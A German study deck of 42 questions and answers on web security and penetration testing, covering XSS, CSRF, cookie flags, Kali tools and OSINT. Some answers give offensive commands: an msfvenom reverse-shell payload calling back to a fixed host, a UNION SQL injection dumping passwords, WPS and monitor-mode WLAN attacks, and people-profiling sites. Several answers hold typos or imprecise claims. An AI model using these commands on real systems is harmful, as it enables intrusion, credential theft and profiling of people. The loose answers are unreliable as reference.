01-Broken Access Control

Question 1

Welche Zugriffskontrollen werden über Access Control umgesetzt?

Answer 1

Das Benutzer nicht ausserhalb der ihnen zugewiesenen Rechte handeln können

Question 2

Was meint man mit Cryptographic Failure?

Answer 2

Alle Fehler die zu einer Offenlegung der sensiblen Daten(Passwort, Kreditkarte. Gesundheitsdaten etc.) führen können.

Question 3

Was ist eine Reflected XSS-Schwachstelle?

Answer 3

Wenn der Übertragungsparameter in einem HTTP Request einer Webanwendung ungefiltert wieder in die Antwort HTML-Seite eingebunden wird.

Question 4

Was ist ein Persistent XSS?

Answer 4

Ähnlich wie Reflected führt einen Javascript Angriff in der Webanwendung, um Zugriff Informationen vom jeweiligen Benutzer zu erhalten

Question 5

Was ist ein DOM-Based XSS?

Answer 5

Einbinden von Javascript-Code in einer Webseite. Fehler in einem Javascript der Anwendung

Question 6

Was ist ein Request Forgery?

Answer 6

Heimliche,böswillige Ausführen von HTTP Requests.
Keine Abmeldung bei E-Banking, dann geht der Benutzer auf eine fake Webseite und ein Script führt ein HTTP Request auf die Online Banking mit 2000CHF Überweisungen, da Session in Cookie gespeichert ist akzeptieret die Bank den Request

Question 7

HTTP Cookies und Zusatz Optionen?

Answer 7

Werden bei jeder Anfrage an dem Webserver übertragen.

HTTP Response Header (Server) Cookie setzten- Set-Cookie:SessionID:6755

HTTP Request Header (Client) Browser seitenabruf-Cookie:SessionID:6755

Question 8

Set-Cookie Optionen

Answer 8

Path- für welchen Pfad

Secure- Übermittlung nur bei HTTPS-Verbindung

HttpOnly- verhindert das JavaScript auf das Cookie zugreifen kann.

SameSite- verhindert das Cookie mit seitenübergreifende Anfrage sendet. Bietet Schutz gegen XSS-Request-Forgery-Angriffe

Question 9

HTTP-Response Header Optionen

Answer 9

Location- Antwort des Webserver“3xx“ Antwort

Server- Info Webserver

Set-Cookie- Cookie der Domain geschrieben

Question 10

Spidering

Answer 10

Sammlung Unterverzeichnis, Formulare, Versand E-Mails, Info in Cookie

Tools: Webscarab,DirBuster, BurpSuite

Question 11

Wie kann man Übergabedaten manipulieren?

Answer 11

Form Fiels

Http-Cookies

Http-Header(Referer, Browser)

Question 12

Http Referer Header

Answer 12

Nachprüfungen, ob ein Benutzer von bestimmte Ressource kommt.

Question 13

Was ist eine SOAP Injection XML External Entity (XEE)

Answer 13

Greift Applikationen an die XML Parsen. Eine External Entity erlaubt den Zugriff auf lokale oder entfernte Daten über einen deklarierten System-Identifier.

Question 14

WLAN-Adapter Monitoremode?

Answer 14

Airmon-ng start wlan0
Airmon-ng check kill

Question 15

Wireshark Filter um Mobile-Geräte Probes zu erkennen?

Answer 15

wlan.fc.type_subtype == 0x04

Question 16

Wlan-Karte in Monitoremode bringen?

Answer 16

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Question 17

Wlan Scanning
Airodump-ng?

Answer 17

airodump-ng wlan0

Question 18

Nmap Befehl findet Schwachstellen finden?

Answer 18

nmap —script vuln

Question 19

Nmpa öffentliche Skripte nach CVE?

Answer 19

nmap —script vulners

Question 20

Wörtliste erstellen für Wlan-Hacking?

Answer 20

Cewl und Chrunch

Question 21

Passwort hashen mit sha256?

Answer 21

echo -n “passwort” | sha256sum

Question 22

Wlan Hacking befehl “wash”

Answer 22

WPS Schwächen finden
wash -i wlan0

wash -i wlan0 -C | grep SSID

Question 23

OSINT Personensdetails der Angstellten finden?

Answer 23

Emailcrwalr.com

Question 24

Eingesetzte CMS prüfen?

Answer 24

whatcms.org

Question 25

SQL-Injection, Alle Benutzer mit Passwort ausgeben?

Answer 25

Select book, autor from bibel UNION select username,password from userdata —

Question 26

DNS-Abfragen nur Ergebnisse?

Answer 26

dig +short -t any test.ch

Question 27

Befehl für halboffene Ports scannen?

Answer 27

-sS(TCP-SYN-Scan)

Question 28

Was verhindert ein httpOnly flag beim Cookie?

Answer 28

Verhindert das Cookie durch Scripte ausgelesen werden können.

Question 29

Was ist ein secure Cookie?

Answer 29

Cookie werden verschlüsselt mittels Https übermittelt.

Question 30

Exploits finden mit welchem Kali Tool?

Answer 30

searchsploit

Question 31

Msfvenom encoder Befehl erstellen

Answer 31

msfvenom -p windows/meterpreter/reverse_https
LHOST=192.168.101.34 LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe > bad.exe

Question 32

Einfacher Nmap Befehl für offene Ports, Versionen und Schwachstellen

Answer 32

nmap -SV -A 192.168.201.1

Question 33

Tastaturlayaout einstellen Befehl?

Answer 33

dpkg-reconfigure keyboard-configuration

Question 34

Zeitzone einstellen Code

Answer 34

dpkg-reconfigure tzdata

Question 35

Mit was kann man Hosts auskundschaften?

Answer 35

Whois?
Dnslytics.com
Dnsdumpster.com
Netcraft.com
Traceroute
Dns recon

Question 36

Auskundschaften E-mail?

Answer 36

Haveibeenpwned
Azurewebsites.net

Question 37

Auskundschaften Person?

Answer 37

Yasni.de
Moneyhouse.ch
Autonummer abfragen

Question 38

Wireshark filter Monitore mode PROBES?

Answer 38

wlan.fc.type_subtype ==0x04

Question 39

Wireshark Filter Monitor mode BEACONS?

Answer 39

wlan.fc.type_subtype ==0x08

Question 40

Hashwert von Datei prüfen?

Answer 40

Sha265sum password.sh

Question 41

Passwort testing bei Onlinedienst

Answer 41

Hydra, Medusa und Ncrack

Question 42

Auskundschaften Website?

Answer 42

• Robots.txt
• Security Header Einstellungen prüfen
• Cookie Einstellungen
• Banner
• Internetarchiv